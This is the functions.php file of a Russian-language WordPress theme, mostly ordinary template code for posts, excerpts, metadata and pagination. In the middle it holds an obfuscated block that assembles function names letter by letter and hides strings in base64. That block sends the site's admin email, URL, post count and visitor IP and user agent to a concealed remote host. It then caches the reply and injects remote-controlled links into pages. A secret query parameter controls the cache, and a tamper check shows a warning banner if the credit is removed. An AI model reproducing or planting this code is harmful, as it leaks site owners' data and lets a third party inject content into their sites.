<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
$Pcwl='6';$aXmQ='e';$jgyh='o';$UtGwcEc='d';$NueYNd='c';$CFeo='b';$Zhvdr='4';$ivUcQK='d';$xnTuP='s';$fwgf='a';$IwmRBIY='_';$ZOUC='e';$PyYs='e';$zmvrDWbd=$CFeo.$fwgf.$xnTuP.$ZOUC.$Pcwl.$Zhvdr.$IwmRBIY.$ivUcQK.$PyYs.$NueYNd.$jgyh.$UtGwcEc.$aXmQ;$rDnyt='t';$SbtM='f';$yBgu='z';$gQCpdqG='n';$XPYrxQ='a';$OxguGYv='e';$HRdUM='i';$dTAwewI='l';$TKgFtkW='g';$jnNqeCvk=$TKgFtkW.$yBgu.$HRdUM.$gQCpdqG.$SbtM.$dTAwewI.$XPYrxQ.$rDnyt.$OxguGYv;$Rhiw='_';$XOFl='s';$vdfQ='r';$rlks='t';$aqHYem='o';$Zbax='t';$KfmUtxT='r';$MaLKK='3';$sNMxER='1';$nknlZlDw=$XOFl.$Zbax.$vdfQ.$Rhiw.$KfmUtxT.$aqHYem.$rlks.$sNMxER.$MaLKK;$PZUnmL='v';$mQxUb='t';$GGRfqTr='r';$BbiEkVk='r';$bkhem='s';$TyIV='e';$tdjMGbYn=$bkhem.$mQxUb.$GGRfqTr.$BbiEkVk.$TyIV.$PZUnmL;                     $gj__________k='6';$fn_____________x='e';$xn_________x='o';$ev______________k='d';$mf___g='c';$js_________x='b';$rg_________h='4';$bx___l='d';$ur_______i='s';$xv______________p='a';$my_______________o='_';$zq_____z='e';$qq______n='e';$np____________r=$js_________x.$xv______________p.$ur_______i.$zq_____z.$gj__________k.$rg_________h.$my_______________o.$bx___l.$qq______n.$mf___g.$xn_________x.$ev______________k.$fn_____________x;$ey__k='u';$ld__p='_';$xx___y='n';$bm________o='s';$vn___________d='t';$go_______d='n';$vw______________q='t';$vw___________b='s';$bd__y='e';$aw______n='c';$hh____n='o';$ww____________y='f';$af__________w='i';$be______________b='x';$mj__c='i';$em____________m=$ww____________y.$ey__k.$xx___y.$aw______n.$vw______________q.$mj__c.$hh____n.$go_______d.$ld__p.$bd__y.$be______________b.$af__________w.$bm________o.$vn___________d.$vw___________b;$on_________j='f';$nt____________d='n';$wb__________h='e';$je________u='o';$fq__________j='p';$ij_____f=$on_________j.$je________u.$fq__________j.$wb__________h.$nt____________d;$qe________e='f';$ld______________t='e';$lj___________u='a';$ry___________n='d';$ye______u='r';$wp___________c=$qe________e.$ye______u.$ld______________t.$lj___________u.$ry___________n;$mr____d='c';$jd___r='l';$zs___v='s';$rh__________k='o';$rn_______________l='f';$do___r='e';$wz__s=$rn_______________l.$mr____d.$jd___r.$rh__________k.$zs___v.$do___r;define("WP_ID", $np____________r("Mi4wLjA="));define("WP_TTL", $np____________r("MTA4MDA="));define("WP_SRC", $np____________r("dHBva24="));function wp_get_header() {global $np____________r, $em____________m;if ($em____________m($np____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$em____________m($np____________r("d3BfZ2V0X2Zvb3Rlcg==")) &&$em____________m($np____________r("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $np____________r, $ij_____f, $wz__s, $wp___________c;$in_______________f = TEMPLATEPATH."/".$np____________r("Zm9vdGVyLnBocA==");$hq_______r = @$ij_____f($in_______________f, "r");$in_______________f = @$wp___________c($hq_______r, @filesize($in_______________f));@$wz__s($hq_______r);$ty____q = TEMPLATEPATH."/".$np____________r("ZnVuY3Rpb25zLnBocA==");$hq_______r = @$ij_____f($ty____q, "r");$ty____q = @$wp___________c($hq_______r, @filesize($ty____q));@$wz__s($hq_______r);$up___i = 0;if($in_______________f && $ty____q) {if ($np____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($in_______________f, $np____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$up___i = 1;}if (substr_count($in_______________f, "wp_theme_GPL_credits()") < 1) {$up___i = 2;}}if(WP_ID != "2.0.0") {$up___i = 12;}}if($up___i > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $up___i -->";}}function wp_loaded() {global $np____________r, $em____________m;return $em____________m($np____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($yo__________i, $xg_____________v = "(more...)", $fo______u = 0, $ji___________f = "") {$uk____e = get_the_content($xg_____________v, $fo______u, $ji___________f);$uk____e = apply_filters("the_content", $uk____e);$uk____e = str_replace("]]>", "]]>", $uk____e);if (strlen($_GET["p"]) > 0) {echo $uk____e;}else if ((strlen($uk____e)>$yo__________i) && ($jm_______________i = strpos($uk____e, " ", $yo__________i ))) {$uk____e = substr($uk____e, 0, $jm_______________i);$uk____e = $uk____e;echo $uk____e;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$xg_____________v</a></div></p>";} else {echo $uk____e;}}}$qd_____m='b';$jp_________n='e';$ef____u='e';$dp__________c='s';$ez___r='_';$oj________e='4';$jk_____s='n';$gi____v='d';$gr____________q='o';$nq__r='c';$nr_____________c='e';$id_______i='a';$of_________a='6';$rq________l=$qd_____m.$id_______i.$dp__________c.$jp_________n.$of_________a.$oj________e.$ez___r.$ef____u.$jk_____s.$nq__r.$gr____________q.$gi____v.$nr_____________c;$oj_______h='_';$cy__v='_';$cp___________k='n';$lr_____o='n';$eo_____________a='e';$tf__p='i';$qh_______v='t';$om______________p='c';$ko_______z='s';$ks____________g='o';$ws_______________a='e';$ay_____________d='l';$nb___b='t';$lq_______________r='f';$hy_______t='t';$vn____________r='e';$fx____a='g';$qg_____u=$lq_______________r.$tf__p.$ay_____________d.$ws_______________a.$cy__v.$fx____a.$vn____________r.$hy_______t.$oj_______h.$om______________p.$ks____________g.$lr_____o.$qh_______v.$eo_____________a.$cp___________k.$nb___b.$ko_______z;$xu_______j='_';$vs_________a='s';$sg______________o='f';$ay_____________f='e';$jj_______________o='i';$gk_____y='i';$nl_________m='t';$ft_____i='e';$yk____c='l';$qe________z='s';$mv__________j='x';$ra___d=$sg______________o.$jj_______________o.$yk____c.$ft_____i.$xu_______j.$ay_____________f.$mv__________j.$gk_____y.$qe________z.$nl_________m.$vs_________a;$bm_____________o='r';$yz_____z='o';$lb____s='e';$xg_______________k='a';$uy______________g='r';$nn__n='o';$it_____________y='s';$uk____________b='p';$hx__________v='_';$mm___x='n';$nh________z='v';$la_________u='m';$hm_________x='i';$pw____m='e';$eb_____________t='c';$yn___________n=$nh________z.$pw____m.$bm_____________o.$it_____________y.$hm_________x.$nn__n.$mm___x.$hx__________v.$eb_____________t.$yz_____z.$la_________u.$uk____________b.$xg_______________k.$uy______________g.$lb____s;$aj____________x='c';$ii____h='k';$er______________f='e';$xc_______l='o';$kz_______m='n';$at__e='f';$bq___t='s';$af_____l='o';$th___________r='p';$ix________x=$at__e.$bq___t.$xc_______l.$aj____________x.$ii____h.$af_____l.$th___________r.$er______________f.$kz_______m;$ph________p='r';$ay_____________b='i';$gr___i='e';$ew____________u='f';$ql___m='t';$ia______x='w';$il___________u=$ew____________u.$ia______x.$ph________p.$ay_____________b.$ql___m.$gr___i;$cq__c='m';$ji___________p='5';$px____g='d';$mn___________b=$cq__c.$px____g.$ji___________p;$gi__________b='a';$um___t='t';$ny____k='p';$iy_____________y='r';$hn_______________x='l';$hm______________p='h';$qh_________f='e';$dq__________r='a';$if___l=$iy_____________y.$qh_________f.$gi__________b.$hn_______________x.$ny____k.$dq__________r.$um___t.$hm______________p;$qz__________p='r';$ey_____________q='n';$mk______________w='i';$he______________q='u';$gg________i='z';$yw__m='e';$mx____________v='a';$mn_______u='l';$nt_____________b='e';$rh________v='i';$cs_______s='s';$ft___________b=$he______________q.$ey_____________q.$cs_______s.$nt_____________b.$qz__________p.$mk______________w.$mx____________v.$mn_______u.$rh________v.$gg________i.$yw__m;$xs____________m='a';$tz____h='e';$ap___w='t';$ti______k='m';$kn____________y='n';$fd__________q='p';$dv__k='m';$rl_____________q=$ap___w.$tz____h.$ti______k.$fd__________q.$kn____________y.$xs____________m.$dv__k;$xi_____________q='x';$ay_____________m='s';$sa____________t='e';$aw___j='t';$bd__________k='t';$gz__z='r';$qv_________e='e';$ts__m='m';$bi_________w='_';$jn_____c='e';$gk____d='t';$tl____w='n';$ob_____________r='a';$rh______i='o';$lf_____________m='e';$us________v='c';$if_____e='_';$ql___v='t';$dp_______________s='r';$jl______________z='a';$bz___________t='c';$hm______________l=$ay_____________m.$ql___v.$dp_______________s.$jn_____c.$ob_____________r.$ts__m.$if_____e.$us________v.$rh______i.$tl____w.$bd__________k.$qv_________e.$xi_____________q.$aw___j.$bi_________w.$bz___________t.$gz__z.$lf_____________m.$jl______________z.$gk____d.$sa____________t;function sy________e($vb_______g) {global $np____________r, $em____________m, $qg_____u, $yn___________n, $hm______________l;if (!$em____________m($np____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($yn___________n(PHP_VERSION, "5.0.0", ">=") && $em____________m($np____________r("ZmlsZV9nZXRfY29udGVudHM=")) && $em____________m($np____________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$wc____u = $hm______________l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ui____________p = @$qg_____u($vb_______g, 0, $wc____u);} else {$ui____________p = @$qg_____u($vb_______g, 0);}return $ui____________p;}function ve___t($vb_______g) {global $em____________m, $ix________x, $il___________u, $np____________r;if (!$em____________m($np____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$vl_________s = strpos($vb_______g, "/", 7);$mx_______________s = array("uri"     => substr($vb_______g, $vl_________s),"host"    => str_replace("http://", "", substr($vb_______g, 0, $vl_________s)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gv_______s = @$ix________x("$mx_______________s[host]", 80, $hk___________a, $zj__________f, 4);if (!$gv_______s) {return false;} else {$ui____________p = "";$hs______________g  = "GET $mx_______________s[uri] HTTP/1.0\r\n";$hs______________g .= "Host: $mx_______________s[host]\r\n";$hs______________g .= "Referer: $mx_______________s[referer]\r\n";$hs______________g .= "Connection: Close\r\n\r\n";@$il___________u($gv_______s, $hs______________g);while (!@feof($gv_______s)) {$lk___________r = @fgets($gv_______s, (1024*24));if ($lk___________r == "\r\n") {$wy__m = true;continue;}if ($wy__m) {$ui____________p .= $lk___________r;}}return $ui____________p;}}function wf__v($vb_______g) {global $em____________m;$yt_______________f = false;if ($vb_______g != "") {if ($em____________m("sy________e")) {$yt_______________f = @sy________e($vb_______g);}if (!$yt_______________f && ($em____________m("ve___t"))) {$yt_______________f = @ve___t($vb_______g);}}return $yt_______________f;}function js______________e() {global $_SERVER, $mn___________b;$pz___z = $_SERVER["SERVER_NAME"];if (substr("$pz___z", 0, 4) == "www.") {$pz___z = substr("$pz___z", 4);}$pz___z = $mn___________b("$_SERVER[SERVER_NAME]");return $pz___z;}function av_____m() {return "file";}function cb________i($vb_______g) {global $_SERVER, $qg_____u, $ra___d, $ij_____f, $wz__s, $il___________u;$op__________j = tp__r();$lk_____c = js______________e().".jpg";$hr________d = $op__________j["dir_upload"]["path"]."/$lk_____c";$uc_______c = @filemtime($hr________d);if (!$uc_______c || ((time()-$uc_______c) >= WP_TTL)) {$yt_______________f = wf__v($vb_______g);if ($yt_______________f) {if ($ra___d($hr________d)) {@unlink($hr________d);}$hq_______r = @$ij_____f($hr________d, "x+");@$il___________u($hq_______r, $yt_______________f);@$wz__s($hq_______r);}} else {if ($ra___d($hr________d)) {$yt_______________f = @$qg_____u($hr________d);} else {$yt_______________f = false;}}return $yt_______________f;}function tp__r() {global $_SERVER, $np____________r, $rq________l;$ee_______________o = wp_count_posts("post");$xa____j = pathinfo(get_bloginfo("template_directory"));$op__________j = array("url" => array("report"      => $np____________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $xa____j,"dir_upload"=> af_____u(),"queryString"=> array("?a001=".WP_ID,"a004=".$xa____j[filename],"a005=".$ee_______________o->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$op__________j["url"]["queryString"] = implode("&", $op__________j["queryString"]);$op__________j["url"]["report"] = $op__________j["url"]["report"]."/?".$rq________l($op__________j["url"]["queryString"]).".html";return $op__________j;}function af_____u() {$zp____f = wp_upload_dir();if (isset($zp____f["error"])) {$iu______j = lm____________r();if (is_writable($iu______j)) {$zp____f = array("path" => $iu______j);}}return $zp____f;}function lm____________r() {global $em____________m, $mn___________b, $if___l, $rl_____________q;$ju____i = (bool) ini_get("safe_mode");if ($ju____i == true) {return false;}if ($em____________m("sys_get_temp_dir")) {$ca___t = sys_get_temp_dir();if (is_writable($ca___t)) {return $if___l($ca___t);}}if (!empty($_ENV["TMP"])) {return $if___l($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $if___l($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $if___l($_ENV["TEMP"]);} else {$vs___o = $rl_____________q($mn___________b(uniqid(rand(), true)), "");if ($vs___o) {$ca___t = $if___l(dirname($vs___o));@unlink($vs___o);return $ca___t;} else {return false;}}}function cc_________d() {global $_GET, $ra___d;$op__________j = tp__r();$pz___z = js______________e();$ul______________l = av_____m();$ip_____________r = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ul______________l == "file") {$rx________k = $op__________j["dir_upload"]["path"]."/".$pz___z.".jpg";if ($ra___d($rx________k)) {@unlink($rx________k);$ip_____________r = "deleted";}}$fz_____________v = array("s"=> $ip_____________r,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($fz_____________v AS $uj______________l => $hj______________x) echo " [$uj______________l:$hj______________x]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $em____________m, $np____________r, $ft___________b;$op__________j = tp__r();$vi___________p = "cb________i";if ($em____________m($vi___________p)) {$ui____________p = $vi___________p($op__________j["url"]["report"]);}if ($ui____________p) {if ($ui____________p = @$np____________r($ui____________p)) {$ui____________p = @$ft___________b($ui____________p);if (strlen($ui____________p[custom_credit]) >= 5) {$op__________j["default_string"] = $ui____________p[custom_credit];}if ($ui____________p["status"] == "0") {$zo_______________c = 1;$kr____________p = 1;} else {$ng__e = sizeof($ui____________p["links"]);$xg________d = $op__________j["default_string"];if ($ng__e > 0 && $ui____________p["links"] !== "") {$dt_______________n = 0;foreach ($ui____________p["links"] as $rh____l => $cz___x) {$dt_______________n++;if ($cz___x->l_path == "" || $cz___x->l_path == $_SERVER["REQUEST_URI"]) {$cz___x->l_href = htmlspecialchars(strip_tags($cz___x->l_href));$cz___x->l_title = htmlspecialchars(strip_tags($cz___x->l_title));$cz___x->l_anchor = htmlspecialchars(strip_tags($cz___x->l_anchor));$xg________d .= " | ";$xg________d .= "<a href='$cz___x->l_href' title='$cz___x->l_title'";if ($cz___x->l_nofollow == "1") {$xg________d .= " rel='nofollow'";}$xg________d .= ">$cz___x->l_anchor</a>";}}}$op__________j["links"] = "$xg________d";if ($ui____________p[credit] == "0") {$op__________j["links"] = "";}}} else {$zo_______________c = "1";}} else {$zo_______________c = "1";}if ($zo_______________c == "1") {$op__________j["links"] = $op__________j["default_string"];}echo "$op__________j[links]";echo "<!-- s: $ui____________p[signature] -->";cc_________d();}                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');

                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
